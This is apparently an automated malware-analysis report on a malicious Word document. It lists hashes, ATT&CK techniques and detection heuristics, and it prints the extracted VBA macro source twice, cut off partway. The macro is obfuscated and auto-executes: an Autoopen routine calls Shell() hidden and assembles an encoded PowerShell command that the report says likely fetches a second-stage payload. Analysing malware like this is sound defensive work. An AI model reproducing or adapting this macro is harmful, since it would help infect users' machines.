Office (OLE) malware analysis — malicious · 7d1e6b7051a4dc8a

MALICIOUS

Office (OLE)

102.5 KB Created: 2018-05-30 11:03:00 Authoring application: Microsoft Office Word First seen: 2019-12-09

MD5: 419aec47c8768be5d17d68b70ebccb62 SHA-1: b5226570e760651815cf787d82ad059a478398b1 SHA-256: 7d1e6b7051a4dc8a265df084ed1075cb8036b4a57cf89bec02d9b16b068a9219

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an Autoopen subroutine. This subroutine calls a function that constructs and executes a PowerShell command. The constructed PowerShell command is 'powershell -ExecutionPolicy Bypass -WindowStyle hidden -e SQBuAFYAbwBwAHMAZQBTAHkAcwB0AGUAbQBhAG4AZwBlAHIAYQBwAHMAUgB1AG4A', which is designed to run hidden and likely downloads and executes a second-stage payload. The presence of the Shell() call and the Autoopen marker strongly indicate malicious intent.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14128 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	14128 bytes
SHA-256: `26728390b9bb7ed2d86fbdbbea0920956999dd08f02401a8dd665c2c10c6c9d1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "UWIbRtrdWfMu" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function BhECP() On Error Resume Next XwqPS = Fix(97430 / CSng(99464) * pwtlVG * GiijKL) VhBn = CDate(82074) zdFiiH = Fix(29418 / CSng(51547) * fwdpU * uwMnjE) VhBn = CDate(27996) BhECP = zzPIMqlwTV + KKSTchjPBdw + VFBkOjPmWsC + mKLLZavlsWj + uoRZb + PRXiVf + vVvvbii + KmhCMwm + VLuBz + zlRFZkdAj hmPkYq = Fix(65702 / CSng(86776) * jEsmMU * ZZXVG) VhBn = CDate(43323) End Function Sub Autoopen() On Error Resume Next Almkiw = Fix(46844 / CSng(19446) * jzYrPW * kqmHzk) VhBn = CDate(53500) pNTOsHzwn (BhECP) iirNG = Fix(63556 / CSng(86915) * KJPwl * AuTWS) VhBn = CDate(17939) End Sub Function pNTOsHzwn(uPRHKtnCtS) On Error Resume Next ncFCin = Fix(59825 / CSng(39286) * fPKdC * HKDFq) VhBn = CDate(45850) LGKvJm = dfTfMzoGwVC + Shell(ZkmfKPG + (Chr(vbKeyP)) + aXiqs + uPRHKtnCtS + kHmpWzdO, AwAJnWj + vbHide + FAaDYZazfD) hAXFd = Fix(80950 / CSng(83352) * aSSTuC * KXtOFv) VhBn = CDate(57578) End Function Attribute VB_Name = "oHEwnITMTRZuEi" Function zzPIMqlwTV() On Error Resume Next pXbqY = Fix(31734 / CSng(12006) * QHiiCX * APdjw) VhBn = CDate(94076) VoHvjkjwsjn = "owersH" + "eLL -" + "WinDo" + "wsTyl" + "e hidden " + "-e SQBuAFYAb" + "wBrAGUA" + "LQBlAHgAcABSA" + "GUAUwBzAEkAbwB" JzbQMK = Fix(1806 / CSng(84624) * btnrVb * RjinoJ) VhBn = CDate(77808) OCaWla = "OACgAKAAoAC" + "gAIgB7A" + "DEAMwB9AHsA" + "OAA0AH" QKMAo = Fix(79158 / CSng(97019) * bwNbPI * vuYdH) VhBn = CDate(70948) PSwpAtci = "0AewAzADcAfQ" + "B7ADYAMAB9" + "AHsAO" + "QA3AH" ffZoM = Fix(5214 / CSng(38531) * CzKMz * zADoc) VhBn = CDate(7735) dhwnOiGB = "0AewA" + "0ADYA" + "fQB7ADEANQB" + "9AHsAOQAwAH" + "0AewA5ADM" + "AfQB7A" sHzLJ = Fix(55563 / CSng(67087) * QfjiCi * bzdvVS) VhBn = CDate(92434) IlXhQvB = "DEAMAB9" + "AHsAMQAxADEA" + "fQB7ADEANwB9AHs" + "AMgAwAH0AewAx" RDICz = Fix(89521 / CSng(38878) * ijCnXa * CZlQlU) VhBn = CDate(57522) iQscmufFQwS = "ADEAfQB7ADkANgB" + "9AHsAMgA0AH0" + "AewAzADgAfQB7" + "ADEAMQA0AH0Ae" zWRZDL = Fix(63451 / CSng(65882) * wtiIAa * wwqCzz) VhBn = CDate(84332) jEmHCTAjo = "wAzADMAfQB7ADEA" + "OAB9A" + "HsAOQAxAH0Ae" + "wA3ADYAfQB7ADM" + "AMgB9AHsANQA" + "xAH0AewA2A" zzPIMqlwTV = VoHvjkjwsjn + OCaWla + PSwpAtci + dhwnOiGB + IlXhQvB + iQscmufFQwS + jEmHCTAjo End Function Function KKSTchjPBdw() On Error Resume Next BXaVk = Fix(4127 / CSng(19949) * nVLfjV * czwIq) VhBn = CDate(57905) nbwqkBoH = "DUAfQB7ADkAOQB9" + "AHsAMwAwAH0AewA" + "xADQAfQB7" + "ADIAOAB9AHsA" UCzzSp = Fix(56385 / CSng(53542) * ziHYjl * zrmzv) VhBn = CDate(75226) IuCOvv = "NwAzAH" + "0AewAyADYAfQB7A" + "DYAOQB" + "9AHsANAAxA" + "H0AewA3ADQAfQ" + "B7ADcANwB" + "9AHsAMgA5AH0Aew" + "A2ADMA" + "fQB7ADM" uEdjNE = Fix(98234 / CSng(83624) * iJCYW * kVQLlO) VhBn = CDate(2047) bcMcjRD = "ANAB9AH" + "sANAA" + "3AH0AewA" + "4ADIAfQB7AD" + "EAMAAyAH0Aew" + "A3ADgAfQB7ADU" + "AMAB9AHsAMQB9AH" wjrmA = Fix(32023 / CSng(7483) * whNEuo * PXkFd) VhBn = CDate(55850) QzbiPsDsDt = "sANAAzAH0AewA1" + "ADkAfQB7" + "ADUANAB9AH" + "sAOQAyAH0AewAy" + "ADEAfQB7" + "ADcAf" dNoMH = Fix(33369 / CSng(68220) * Batjjw * RwazA) VhBn = CDate(25039) SQYmNmhDo = "QB7AD" + "gAMAB9AHsAMQAw" + "ADYAfQB" + "7ADgAfQB7AD" + "gANQB9AHs" + "AMwAxAH0AewA4" KRqvL = Fix(2271 / CSng(76380) * IXvhF * woImuM) VhBn = CDate(60606) LPUHS = "ADgAfQB7ADUAMg" + "B9AHsANQA3" + "AH0Ae" + "wA2AD" + "EAfQB7ADQAN" KKSTchjPBdw = nbwqkBoH + IuCOvv + bcMcjRD + QzbiPsDsDt + SQYmNmhDo + LPUHS End Function Function VFBkOjPmWsC() On Error Resume Next LOIMsG = Fix(74397 / CSng(59515) * cBICXW * FiwAR) VhBn = CDate(41592) wtMKfpjT = "QB9AHsAMgAyAH0A" + "ewAzAH0Aew" + "AxADAAMwB" + "9AHsANQA4AH0Aew" wrsTJR = Fix(21417 / CSng(11863) * qXGbm * IhOdsT) VhBn = CDate(61241) kiEdjlkvzz = "A2ADQAfQB7AD" + "QAOQB9AHsAMAB9A" + "HsAOQA1AH0A" + "ewA1ADYAfQB7AD" + "QANAB9AHsAMQAw" + "ADUAf ... (truncated)

SHA-256: 26728390b9bb7ed2d86fbdbbea0920956999dd08f02401a8dd665c2c10c6c9d1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "UWIbRtrdWfMu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function BhECP()
On Error Resume Next
XwqPS = Fix(97430 / CSng(99464) * pwtlVG * GiijKL)
VhBn = CDate(82074)
zdFiiH = Fix(29418 / CSng(51547) * fwdpU * uwMnjE)
VhBn = CDate(27996)
BhECP = zzPIMqlwTV + KKSTchjPBdw + VFBkOjPmWsC + mKLLZavlsWj + uoRZb + PRXiVf + vVvvbii + KmhCMwm + VLuBz + zlRFZkdAj
hmPkYq = Fix(65702 / CSng(86776) * jEsmMU * ZZXVG)
VhBn = CDate(43323)
End Function
Sub Autoopen()
On Error Resume Next
Almkiw = Fix(46844 / CSng(19446) * jzYrPW * kqmHzk)
VhBn = CDate(53500)
pNTOsHzwn (BhECP)
iirNG = Fix(63556 / CSng(86915) * KJPwl * AuTWS)
VhBn = CDate(17939)
End Sub
Function pNTOsHzwn(uPRHKtnCtS)
On Error Resume Next
ncFCin = Fix(59825 / CSng(39286) * fPKdC * HKDFq)
VhBn = CDate(45850)
LGKvJm = dfTfMzoGwVC + Shell(ZkmfKPG + (Chr(vbKeyP)) + aXiqs + uPRHKtnCtS + kHmpWzdO, AwAJnWj + vbHide + FAaDYZazfD)
hAXFd = Fix(80950 / CSng(83352) * aSSTuC * KXtOFv)
VhBn = CDate(57578)
End Function


Attribute VB_Name = "oHEwnITMTRZuEi"
Function zzPIMqlwTV()
On Error Resume Next
pXbqY = Fix(31734 / CSng(12006) * QHiiCX * APdjw)
VhBn = CDate(94076)
VoHvjkjwsjn = "owersH" + "eLL -" + "WinDo" + "wsTyl" + "e hidden " + "-e SQBuAFYAb" + "wBrAGUA" + "LQBlAHgAcABSA" + "GUAUwBzAEkAbwB"
JzbQMK = Fix(1806 / CSng(84624) * btnrVb * RjinoJ)
VhBn = CDate(77808)
OCaWla = "OACgAKAAoAC" + "gAIgB7A" + "DEAMwB9AHsA" + "OAA0AH"
QKMAo = Fix(79158 / CSng(97019) * bwNbPI * vuYdH)
VhBn = CDate(70948)
PSwpAtci = "0AewAzADcAfQ" + "B7ADYAMAB9" + "AHsAO" + "QA3AH"
ffZoM = Fix(5214 / CSng(38531) * CzKMz * zADoc)
VhBn = CDate(7735)
dhwnOiGB = "0AewA" + "0ADYA" + "fQB7ADEANQB" + "9AHsAOQAwAH" + "0AewA5ADM" + "AfQB7A"
sHzLJ = Fix(55563 / CSng(67087) * QfjiCi * bzdvVS)
VhBn = CDate(92434)
IlXhQvB = "DEAMAB9" + "AHsAMQAxADEA" + "fQB7ADEANwB9AHs" + "AMgAwAH0AewAx"
RDICz = Fix(89521 / CSng(38878) * ijCnXa * CZlQlU)
VhBn = CDate(57522)
iQscmufFQwS = "ADEAfQB7ADkANgB" + "9AHsAMgA0AH0" + "AewAzADgAfQB7" + "ADEAMQA0AH0Ae"
zWRZDL = Fix(63451 / CSng(65882) * wtiIAa * wwqCzz)
VhBn = CDate(84332)
jEmHCTAjo = "wAzADMAfQB7ADEA" + "OAB9A" + "HsAOQAxAH0Ae" + "wA3ADYAfQB7ADM" + "AMgB9AHsANQA" + "xAH0AewA2A"
zzPIMqlwTV = VoHvjkjwsjn + OCaWla + PSwpAtci + dhwnOiGB + IlXhQvB + iQscmufFQwS + jEmHCTAjo
End Function
Function KKSTchjPBdw()
On Error Resume Next
BXaVk = Fix(4127 / CSng(19949) * nVLfjV * czwIq)
VhBn = CDate(57905)
nbwqkBoH = "DUAfQB7ADkAOQB9" + "AHsAMwAwAH0AewA" + "xADQAfQB7" + "ADIAOAB9AHsA"
UCzzSp = Fix(56385 / CSng(53542) * ziHYjl * zrmzv)
VhBn = CDate(75226)
IuCOvv = "NwAzAH" + "0AewAyADYAfQB7A" + "DYAOQB" + "9AHsANAAxA" + "H0AewA3ADQAfQ" + "B7ADcANwB" + "9AHsAMgA5AH0Aew" + "A2ADMA" + "fQB7ADM"
uEdjNE = Fix(98234 / CSng(83624) * iJCYW * kVQLlO)
VhBn = CDate(2047)
bcMcjRD = "ANAB9AH" + "sANAA" + "3AH0AewA" + "4ADIAfQB7AD" + "EAMAAyAH0Aew" + "A3ADgAfQB7ADU" + "AMAB9AHsAMQB9AH"
wjrmA = Fix(32023 / CSng(7483) * whNEuo * PXkFd)
VhBn = CDate(55850)
QzbiPsDsDt = "sANAAzAH0AewA1" + "ADkAfQB7" + "ADUANAB9AH" + "sAOQAyAH0AewAy" + "ADEAfQB7" + "ADcAf"
dNoMH = Fix(33369 / CSng(68220) * Batjjw * RwazA)
VhBn = CDate(25039)
SQYmNmhDo = "QB7AD" + "gAMAB9AHsAMQAw" + "ADYAfQB" + "7ADgAfQB7AD" + "gANQB9AHs" + "AMwAxAH0AewA4"
KRqvL = Fix(2271 / CSng(76380) * IXvhF * woImuM)
VhBn = CDate(60606)
LPUHS = "ADgAfQB7ADUAMg" + "B9AHsANQA3" + "AH0Ae" + "wA2AD" + "EAfQB7ADQAN"
KKSTchjPBdw = nbwqkBoH + IuCOvv + bcMcjRD + QzbiPsDsDt + SQYmNmhDo + LPUHS
End Function
Function VFBkOjPmWsC()
On Error Resume Next
LOIMsG = Fix(74397 / CSng(59515) * cBICXW * FiwAR)
VhBn = CDate(41592)
wtMKfpjT = "QB9AHsAMgAyAH0A" + "ewAzAH0Aew" + "AxADAAMwB" + "9AHsANQA4AH0Aew"
wrsTJR = Fix(21417 / CSng(11863) * qXGbm * IhOdsT)
VhBn = CDate(61241)
kiEdjlkvzz = "A2ADQAfQB7AD" + "QAOQB9AHsAMAB9A" + "HsAOQA1AH0A" + "ewA1ADYAfQB7AD" + "QANAB9AHsAMQAw" + "ADUAf
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.